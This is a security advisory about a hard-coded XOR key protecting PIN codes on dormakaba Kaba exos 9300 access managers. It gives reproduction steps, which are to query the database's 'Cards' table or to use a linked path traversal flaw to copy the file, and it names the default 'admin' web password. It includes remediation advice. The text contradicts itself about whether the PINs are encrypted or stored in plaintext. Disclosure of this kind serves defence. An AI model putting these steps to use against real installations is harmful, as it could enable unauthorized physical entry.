dormakaba Kaba exos 9300 Hard-Coded Key for PIN Encryption Vulnerability

A vulnerability exists in dormakaba Kaba exos 9300 due to a hard-coded key used for XOR-based encryption of PINs, which are stored in plaintext in an SQLite database on the access manager. This vulnerability affects all versions of the access manager K5 and K7 prior to BAME 06.00.

Impact

Exploitation of this vulnerability allows for the decryption of PIN codes stored in the database, potentially leading to unauthorized access through PIN-based authentication.

Reproduction

The vulnerability can be reproduced by accessing the SQLite database of an affected dormakaba access manager 9200-k5 or 9200-k7 with a version prior to BAME 06.00. Once the database is accessed, the 'Cards' table can be queried to retrieve the PIN codes, which are stored in plaintext. Alternatively, the path traversal vulnerability (CVE-2025-59099) can be exploited to directly access the database file and extract the PINs.

Remediation

Users are advised to update to the latest version of the dormakaba exos 9300 access manager. For access managers K5, this vulnerability can be manually mitigated by changing the default password for the web interface, which is set to 'admin'. Access managers K7 can be updated to a version BAME 06.00 or later, where this vulnerability is fixed.